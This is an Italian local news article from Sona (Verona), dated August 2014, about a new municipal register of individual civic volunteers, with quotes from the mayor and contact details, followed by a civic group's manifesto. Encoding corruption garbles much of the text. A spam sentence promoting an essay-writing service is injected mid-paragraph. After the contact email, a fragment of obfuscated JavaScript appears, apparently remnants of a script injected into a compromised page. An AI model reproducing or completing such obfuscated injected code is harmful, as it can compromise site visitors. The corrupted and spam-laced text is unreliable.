Parte l’albo dei volontari civici a servizio delle tante attivitAi?? del Comune di Sona. “Dall’apertura di sera della biblioteca, all’aiuto nelle varie attivitAi??. Un passo avanti senza precedenti in passato” dichiara il Sindaco.

29 Agosto 2014 – Sona (Verona)

Sempre piA? numerosi sono i cittadini che sono interessati e desiderosi di porre individualmente e gratuitamente al servizio della comunitAi?? amministrata, le proprie competenze e conoscenze nonchAi?? il proprio tempo libero.

“Per questo, il programma della mia Amministrazione – afferma il Sindaco Gianluigi Mazzi – ha tra i propri obiettivi quello di un maggiore avvicinamento e coinvolgimento dei cittadini nellai??i??attivitAi?? amministrativa, sia in veste di fruitori ma soprattutto di collaboratori nelle varie fasi della sua stessa progettazione, realizzazione ed attuazione. Lai??i??Amministrazione comunale deve riconoscere e valorizzare il volontariato ai??i?? sia esso esercitato in forma associata o individuale – con i fatti e non a parole. Esso A? una forma speciale di solidarietAi?? sociale e di partecipazione”.

Un fondamentale passo nella direzione della valorizzazione del volontariato A? quindi considerarlo unai??i??importante risorsa sociale per la comunitAi?? For instance, teachers can create a classroom hashtag and share it with students to writing a research paper with writemypaper4me use when tweeting to their peers. amministrata, da valorizzare disciplinando in primo luogo la sua stessa organizzazione ed attuazione in vari e diversi ambiti di azione.

CiA? ha determinato l’approvazione nel Consiglio Comunale del 20 Maggio u.s., al termine di un lungo percorso iniziato dall’allora Assessore Gianmichele Bianco, dellai??i??Albo dei singoli volontari civici con il quale i singoli individuai comunicano al Comune la propria disponibilitAi?? ed impegno civico.

“Non costa nulla – ammette il Sindaco – ma ci permette da questo punto di vista veramente di colmare quelle che sono soprattutto le lacune che lai??i??Amministrazione ha. A? chiaro che noi andremo ad utilizzare i singoli volontari civici dove ci sarAi?? necessitAi??, su aspetti che possono essere definiti ed inquadrati nel regolamento stesso quali: lai??i??ambito di applicazione culturale, sportivo, ricreativo, quello civile e quello di

supporto. Giusto per fare alcuni esempi nellai??i??ambito culturale, sportivo, ricreativo relativo allai??i??attivitAi?? di

carattere culturale, promozione, valorizzazione della cultura, patrimonio storico, artistico. Ci piace pensare ad una biblioteca aperta anche di sera, non lo possiamo fare con le nostre forze, con il nostro personale, per alcuni limiti imposti, lo possiamo fare anche utilizzando queste forme di volontariato. Sono aspetti che ci chiede la comunitAi??, riteniamo che possa assolutamente essere un elemento interessante, importante nei confronti della comunitAi?? stessa, ed A? solo un esempio” conclude.

Lai??i??iscrizione allai??i??Albo A? aperta senza alcun termine di scadenza; viene effettuata utilizzando il modulo allegato alla comunicazione sul sito del Comune da trasmettere allai??i??indirizzo pec sona.vr@cert.ip-veneto.net o da depositare direttamente allai??i??Ufficio Protocollo del Comune.

Per informazioni: Settore Cultura e Servizi Demografici ai??i?? Responsabile Raffaella Tessaro – Tel. 0456091229 ai??i?? e-mail r.tessaro@comune.sona.vr.it x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.